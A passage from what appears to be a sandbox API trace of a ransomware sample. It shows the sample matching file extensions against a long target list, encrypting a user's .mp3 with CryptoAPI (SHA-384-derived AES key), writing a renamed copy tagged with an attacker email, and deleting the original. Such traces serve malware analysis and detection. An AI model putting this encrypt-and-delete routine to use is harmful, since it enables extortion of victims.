d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".mp3") returned=".mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0191.704] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0191.705] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0191.705] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\0tl74kvj.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\0tl74kvj.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0191.709] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x3de8, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18a640*=0x3de8, lpOverlapped=0x0) returned 1
	[0191.712] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.712] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb198) returned 1
	[0191.714] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.714] CryptCreateHash (in: hProv=0xfcb198, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0191.714] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.714] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0191.715] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.715] CryptDeriveKey (in: hProv=0xfcb198, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb92f0) returned 1
	[0191.715] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.715] CryptEncrypt (in: hKey=0xfb92f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x3de8, dwBufLen=0x3de8 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x3df0) returned 1
	[0191.716] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0191.716] RtlMoveMemory (in: Destination=0xfe0f70, Source=0xfdd180, Length=0x3de8 | out: Destination=0xfe0f70) 
	[0191.716] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.716] CryptEncrypt (in: hKey=0xfb92f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe0f70*, pdwDataLen=0x18a1ec*=0x3de8, dwBufLen=0x3df0 | out: pbData=0xfe0f70*, pdwDataLen=0x18a1ec*=0x3df0) returned 1
	[0191.716] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.717] CryptDestroyKey (hKey=0xfb92f0) returned 1
	[0191.717] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.717] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0191.717] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.717] CryptReleaseContext (hProv=0xfcb198, dwFlags=0x0) returned 1
	[0191.717] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0191.717] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0191.718] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.718] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0191.719] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\0tl74kvj.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 105
	[0191.719] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\0tl74kvj.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\0tl74kvj.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0191.722] WriteFile (in: hFile=0x390, lpBuffer=0xfe0f70*, nNumberOfBytesToWrite=0x3df0, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfe0f70*, lpNumberOfBytesWritten=0x18a648*=0x3df0, lpOverlapped=0x0) returned 1
	[0191.725] CloseHandle (hObject=0x390) returned 1
	[0191.725] CloseHandle (hObject=0x388) returned 1
	[0191.725] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\0tl74kvj.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\0tl74kvj.mp3")) returned 1
	[0191.731] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\0tl74kvj.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\0tl74kvj.mp3")) returned 0
	[0191.731] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x344badf0, ftCreationTime.dwHighDateTime=0x1d970a5, ftLastAccessTime.dwLowDateTime=0xfc45ed10, ftLastAccessTime.dwHighDateTime=0x1d9747f, ftLastWriteTime.dwLowDateTime=0xfc45ed10, ftLastWriteTime.dwHighDateTime=0x1d9747f, nFileSizeHigh=0x0, nFileSizeLow=0xbde0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2FzsAN9cBqSfZ _9.wav", cAlternateFileName="2FZSAN~1.WAV")) returned 1
	[0191.731] lstrcmpW (lpString1="2FzsAN9cBqSfZ _9.wav", lpString2="..") returned 1
	[0191.731] lstrcmpW (lpString1="2FzsAN9cBqSfZ _9.wav", lpString2=".") returned 1
	[0191.731] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\"
	[0191.731] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\", lpString2="2FzsAN9cBqSfZ _9.wav" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\2FzsAN9cBqSfZ _9.wav") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\2FzsAN9cBqSfZ _9.wav"
	[0191.732] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\2FzsAN9cBqSfZ _9.wav") returned 71
	[0191.732] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0191.732] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\2FzsAN9cBqSfZ _9.wav", cchLength=0x47 | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\2fzsan9cbqsfz _9.wav") returned 0x47
	[0191.732] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.732] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\2fzsan9cbqsfz _9.wav", lpSrch="help_decrypt_your_files") returned 0x0
	[0191.732] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\2fzsan9cbqsfz _9.wav" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\2fzsan9cbqsfz _9.wav") returned="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\2fzsan9cbqsfz _9.wav"
	[0191.732] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\2fzsan9cbqsfz _9.wav") returned 71
	[0191.733] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0191.733] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.733] StrStrW (lpFirst=".wav", lpSrch=".") returned=".wav"
	[0191.733] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.733] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".wav") returned=".wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0191.733] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0191.734] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
